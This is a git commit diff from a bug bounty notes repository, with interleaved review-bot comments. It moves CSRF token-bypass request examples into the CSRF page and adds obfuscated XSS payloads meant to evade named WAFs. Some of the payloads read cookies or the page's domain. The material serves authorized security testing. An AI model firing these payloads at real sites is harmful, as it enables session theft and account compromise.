mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 10:26:11 +00:00
feat: added XSS payloads to bypass WAF
parent
5c6916174a
commit
4f51606813
@ -1,30 +0,0 @@
|
|||||||
# Bypass 304 (Not Modified)
|
|
||||||
|
|
||||||
1. Delete "If-None-Match" header
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
```
|
|
||||||
|
|
||||||
2. Adding random character in the end of "If-None-Match" header
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
Host: target.com
|
|
||||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
|
|
||||||
```
|
|
||||||
|
|
||||||
## References
|
|
||||||
* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
|
|
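Review bot: Bypass 304.md is deleted in full here, but the commit subject only mentions adding XSS payloads, and none of the hunks shown re-adds the If-None-Match notes anywhere (the Bypass CSRF content, by contrast, reappears in the CSRF page). If the removal is intended, say so in the commit message; if the notes are being relocated, include the destination in the same commit. The second "Try this to bypass" request in the removed text also carries a duplicated `Host: target.com` line, which should be fixed if the content is restored.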
@ -1,120 +0,0 @@
|
|||||||
# Bypass CSRF
|
|
||||||
|
|
||||||
1. Change single character
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
|
||||||
```
|
|
||||||
|
|
||||||
2. Sending empty value of token
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=
|
|
||||||
```
|
|
||||||
|
|
||||||
3. Replace the token with same length
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaabaa
|
|
||||||
```
|
|
||||||
4. Changing POST / GET method
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
```
|
|
||||||
|
|
||||||
5. Remove the token from request
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456
|
|
||||||
```
|
|
||||||
|
|
||||||
6. Use another user's valid token
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
|
||||||
```
|
|
||||||
|
|
||||||
7. Try to decrypt hash
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=MTIzNDU2
|
|
||||||
```
|
|
||||||
MTIzNDU2 => 123456 with base64
|
|
||||||
|
|
||||||
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
|
||||||
```
|
|
||||||
When we register again, the request like this
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
|
||||||
```
|
|
||||||
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
|
@ -4,7 +4,7 @@
|
|||||||
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
||||||
|
|
||||||
## Where to find
|
## Where to find
|
||||||
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack.
|
||||||
|
|
||||||
## How to exploit
|
## How to exploit
|
||||||
1. HTML GET Method
|
1. HTML GET Method
|
||||||
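Review bot: In "Where to find", the rewritten sentence drops the caveat that a token can be present and still not be enforced, so the paragraph now reads as if a missing token is the only indicator. Keep one sentence saying that token validation still has to be checked, and point it at the "Bypass CSRF Token" section this commit adds to the same file instead of removing the cross-reference outright. "Try submit" should become "Try submitting" while the line is being touched.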
@ -93,3 +93,125 @@ xhr.send('{"role":admin}');
|
|||||||
<br>
|
<br>
|
||||||
</body>
|
</body>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
# Bypass CSRF Token
|
||||||
|
But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things:
|
||||||
|
|
||||||
|
1. Change single character
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Sending empty value of token
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Replace the token with same length
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaabaa
|
||||||
|
```
|
||||||
|
4. Changing POST / GET method
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
|
5. Remove the token from request
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Use another user's valid token
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
||||||
|
```
|
||||||
|
|
||||||
|
7. Try to decrypt hash
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=MTIzNDU2
|
||||||
|
```
|
||||||
|
MTIzNDU2 => 123456 with base64
|
||||||
|
|
||||||
|
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
||||||
|
```
|
||||||
|
When we register again, the request like this
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
||||||
|
```
|
||||||
|
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
||||||
|
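Review bot: The new section opens with `# Bypass CSRF Token`, a top-level heading, while the rest of this file uses `##` ("## Where to find", "## How to exploit"); use `##` so the page keeps a single title. In the same block, item 7 is titled "Try to decrypt hash" but the example is a base64 decode (`MTIzNDU2 => 123456`), which is an encoding and not a hash or encryption, so the title should say that. Item 6 shows a single request with no baseline to compare against, and the intro sentence breaks mid-thought at "on the website. CSRF tokens can still be bypassed". The text is pasted unchanged from the deleted file, so this is the point to fix those.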
@ -344,31 +344,22 @@ javascript://%250Aalert(1)
|
|||||||
```
|
```
|
||||||
<svg%0Aonauxclick=0;[1].some(confirm)//
|
<svg%0Aonauxclick=0;[1].some(confirm)//
|
||||||
|
|
||||||
<svg onload=alert%26%230000000040"")>
|
<svg/onload={alert`1`}>
|
||||||
|
|
||||||
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
||||||
<svg onx=() onload=(confirm)(1)>
|
|
||||||
|
|
||||||
<svg onx=() onload=(confirm)(document.cookie)>
|
|
||||||
|
|
||||||
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
|
|
||||||
|
|
||||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|
||||||
|
|
||||||
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
||||||
|
|
||||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|
||||||
|
|
||||||
"><onx=[] onmouseover=prompt(1)>
|
"><onx=[] onmouseover=prompt(1)>
|
||||||
|
|
||||||
%2sscript%2ualert()%2s/script%2u -xss popup
|
%2sscript%2ualert()%2s/script%2u
|
||||||
|
|
||||||
<svg onload=alert%26%230000000040"1")>
|
|
||||||
|
|
||||||
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
||||||
|
|
||||||
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
||||||
|
|
||||||
|
<svg onload=alert%26%230000000040"1")>
|
||||||
|
|
||||||
<svg onload=prompt%26%230000000040document.domain)>
|
<svg onload=prompt%26%230000000040document.domain)>
|
||||||
|
|
||||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||||
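Review bot: Two entries are dropped in this hunk, not moved: `<svg onx=() onload=(confirm)(document.cookie)>` and `<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>`, along with the `-xss popup` annotation on the `%2sscript` line, and the commit subject ("added XSS payloads") covers none of that. Most of the remaining changes are reorderings of lines that reappear elsewhere in the list, so splitting the reorder from the additions, or listing the removals in the commit message, would make it clear which lines are actually new.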
@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|||||||
|
|
||||||
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
||||||
|
|
||||||
|
<img ignored=() src=x onerror=prompt(1)>
|
||||||
|
|
||||||
|
<svg onx=() onload=(confirm)(1)>
|
||||||
|
|
||||||
|
<--`<img/src=` onerror=confirm``> --!>
|
||||||
|
|
||||||
|
<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
|
||||||
|
|
||||||
|
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
|
||||||
|
|
||||||
|
'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||||
|
|
||||||
|
'"><img/src/onerror=.1|alert``>
|
||||||
|
|
||||||
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
||||||
|
|
||||||
<img ignored=() src=x onerror=prompt(1)>
|
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||||
```
|
```
|
||||||
|
|
||||||
|
2. Cloudfront
|
||||||
|
```
|
||||||
|
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
|
||||||
|
|
||||||
|
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
|
||||||
|
|
||||||
|
"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Cloudbric
|
||||||
|
```
|
||||||
|
<a69/onclick=[1].findIndex(alert)>pew
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Comodo WAF
|
||||||
|
```
|
||||||
|
<input/oninput='new Function`confir\u006d\`0\``'>
|
||||||
|
|
||||||
|
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
|
||||||
|
```
|
||||||
|
|
||||||
|
5. ModSecurity
|
||||||
|
```
|
||||||
|
<a href="jav%0Dascript:alert(1)">
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Imperva
|
||||||
|
```
|
||||||
|
<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
|
||||||
|
|
||||||
|
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
|
||||||
|
|
||||||
|
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
|
||||||
|
|
||||||
|
<a69/onclick=write()>pew
|
||||||
|
|
||||||
|
<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
|
||||||
|
|
||||||
|
<svg onload\r\n=$.globalEval("al"+"ert()");>
|
||||||
|
|
||||||
|
<svg/onload=self[`aler`%2b`t`]`1`>
|
||||||
|
|
||||||
|
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
|
||||||
|
|
||||||
|
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
|
||||||
|
|
||||||
|
<img/src=q onerror='new Function`al\ert\`1\``'>
|
||||||
|
|
||||||
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
|
```
|
||||||
|
|
||||||
|
7. AWS
|
||||||
|
```
|
||||||
|
<script>eval(atob(decodeURIComponent(confirm`1`)))</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF)
|
||||||
|
|
||||||
## References
|
## References
|
||||||
- [Brute Logic](https://brutelogic.com.br/)
|
- [Brute Logic](https://brutelogic.com.br/)
|
||||||
|
- [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF)
|
||||||
- Some random twitter posts
|
- Some random twitter posts
|
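Review bot: The new per-WAF sections ("2. Cloudfront" through "7. AWS") give no source or test date for any entry, and the References list still ends in "Some random twitter posts". WAF rule sets change over time, so record where each entry came from and when it was last observed; that lets readers, including people maintaining rule sets, tell stale entries from current ones. "7. AWS" should also name the product it refers to, since the heading alone does not identify one.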
10
README.md
@ -22,7 +22,9 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||||
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
|
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
|
||||||
|
- [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
|
||||||
- SQL Injection (SOON)
|
- SQL Injection (SOON)
|
||||||
|
- [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
|
||||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||||
|
|
||||||
## Checklist
|
## Checklist
|
||||||
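Review bot: The two added index entries, Server Side Request Forgery and Web Cache Deception, link to `Server%20Side%20Request%20Forgery.md` and `Web%20Cache%20Deception.md`, but neither file is added or modified in the hunks shown. Confirm both already exist on master, otherwise the README gains two dead links. They are also unrelated to the XSS/WAF change named in the commit subject and would sit better in their own commit.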
@ -32,10 +34,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
## List Bypass
|
## List Bypass
|
||||||
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
||||||
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
||||||
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
|
||||||
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
||||||
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
||||||
- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
|
||||||
|
|
||||||
## Miscellaneous
|
## Miscellaneous
|
||||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||||
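Review bot: Removing the "Bypass CSRF" entry leaves "List Bypass" with no pointer to the CSRF token notes, which now sit at the bottom of the CSRF page. Keep an entry here that links to that section, or state in the commit message that the list is shrinking on purpose; the same applies to the removed "Bypass 304" entry.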
@ -50,11 +50,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
|
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
|
||||||
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
||||||
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
||||||
|
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||||
- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
|
- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
|
||||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
|
||||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
|
||||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
|
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
|
||||||
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||||
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
||||||
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
|
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
|
||||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
|
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
|
||||||
@ -69,5 +69,5 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [ ] Tidy up the reconnaisance folder
|
- [ ] Tidy up the reconnaisance folder
|
||||||
- [ ] Seperate the bypass from some vulnerability readme
|
- [ ] Seperate the bypass from some vulnerability readme
|
||||||
- [ ] Writes multiple payload bypasses for each vulnerability
|
- [ ] Writes multiple payload bypasses for each vulnerability
|
||||||
- [ ] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
|
- [x] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
|
||||||
- [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)
|
- [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)
|
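Review bot: The unchanged to-do item "Seperate the bypass from some vulnerability readme" now contradicts this commit, which deletes the standalone Bypass CSRF file and folds its content into the CSRF readme. Drop or reword the item, or keep the bypass notes in their own file. While this list is being edited, "reconnaisance" and "Seperate" are misspelled ("reconnaissance", "Separate").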